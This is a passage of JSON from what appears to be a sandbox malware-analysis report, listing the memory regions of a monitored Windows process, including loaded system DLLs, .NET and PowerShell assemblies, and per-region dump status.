4141056, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 41365503, "entry_point": 0, "filename": null, "id": "region_1504", "name": "pagefile_0x0000000002380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37224448, "timestamp": "00:01:08.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1505", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:08.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1506", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:08.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1507", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:08.300", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4321279, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1508", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:08.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001510-addr_0x0000000002260000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_247", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000002260000", "norm_filename": null, "region_type": "private_memory", "start_va": 36044800, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631986688, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1511", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1512", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:08.438", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001513-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1513", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:08.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631921152, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1526", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:08.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4079615, "entry_point": 4063232, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1560", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:01:08.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 4390912, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1561", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 4390912, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4603903, "entry_point": 4587520, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1562", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 4587520, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 32268287, "entry_point": 31850496, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1563", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 31850496, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_1564", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:08.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001569-addr_0x0000000002920000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43122688, "type": "region", "version": 1 }, "end_va": 43646975, "entry_point": 0, "filename": null, "id": "region_1569", "name": "private_0x0000000002920000", "norm_filename": null, "region_type": "private_memory", "start_va": 43122688, "timestamp": "00:01:08.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1570", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:08.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": "region_1571", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:08.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1572", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:08.695", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001573-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1573", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:08.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1574", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:08.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1575", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:08.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1576", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:08.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4657151, "entry_point": 0, "filename": null, "id": "region_1577", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:01:08.777", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001578-addr_0x00000000027e0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42336255, "entry_point": 0, "filename": null, "id": "region_1578", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:01:08.777", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001579-addr_0x00000000029a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 44695551, "entry_point": 0, "filename": null, "id": "region_1579", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001580-addr_0x0000000002b20000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 45219840, "type": "region", "version": 1 }, "end_va": 45285375, "entry_point": 0, "filename": null, "id": "region_1580", "name": "private_0x0000000002b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 45219840, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1581", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1582", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:08.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1583", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:08.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4730879, "entry_point": 0, "filename": null, "id": "region_1605", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:01:09.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30150655, "entry_point": 0, "filename": null, "id": "region_1606", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:01:09.054", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001607-addr_0x0000000001ce0000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_1607", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001608-addr_0x0000000002880000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1608", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001609-addr_0x0000000002b70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45547520, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_1609", "name": "private_0x0000000002b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 45547520, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 46071808, "type": "region", "version": 1 }, "end_va": 448724991, "entry_point": 0, "filename": null, "id": "region_1610", "name": "private_0x0000000002bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46071808, "timestamp": "00:01:09.063", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001611-addr_0x000000001abf0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 448724992, "type": "region", "version": 1 }, "end_va": 455868415, "entry_point": 0, "filename": null, "id": "region_1611", "name": "private_0x000000001abf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 448724992, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001612-addr_0x000000001b2c0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 455868416, "type": "region", "version": 1 }, "end_va": 456921087, "entry_point": 0, "filename": null, "id": "region_1612", "name": "private_0x000000001b2c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 455868416, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1613", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_1614", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.065", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001615-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1615", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1616", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001617-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1617", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001618-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1618", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001619-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1619", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001620-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1620", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.067", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001711-addr_0x0000000001cd0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30277631, "entry_point": 0, "filename": null, "id": "region_1711", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:01:11.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 456982528, "type": "region", "version": 1 }, "end_va": 460005375, "entry_point": 459664414, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1712", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 456982528, "timestamp": "00:01:11.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1713", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1714", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.174", "type": "region", "version": 1 }, { "dump": { "filename": 